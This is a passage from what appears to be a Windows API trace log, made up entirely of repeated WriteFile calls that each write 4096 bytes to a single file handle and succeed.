lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.892] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.893] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.893] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.893] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.893] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.894] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.894] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.894] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.894] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.895] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.895] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.895] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.898] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.898] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.898] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.898] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.899] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.899] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.899] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.900] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.900] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.900] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.900] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.901] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.901] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.901] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.902] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.902] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.903] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.903] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.904] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.904] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.904] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.904] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.905] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.905] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.905] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.905] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.906] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.906] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.906] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.906] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.907] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.907] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.907] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.908] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.908] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.908] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.908] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.909] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.909] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.909] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.909] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.910] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.910] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.910] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.910] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.911] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.911] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.911] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.912] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.912] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.912] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.913] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.913] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.913] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.913] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.914] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.914] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.914] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.914] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.915] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.915] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.915] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.915] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.916] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.916] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.916] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.916] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.917] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.917] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.917] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.918] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.918] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.918] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.918] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.919] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.919] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.919] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.919] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.920] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.920] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.921] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.921] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.922] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.922] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.922] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.922] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.923] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: 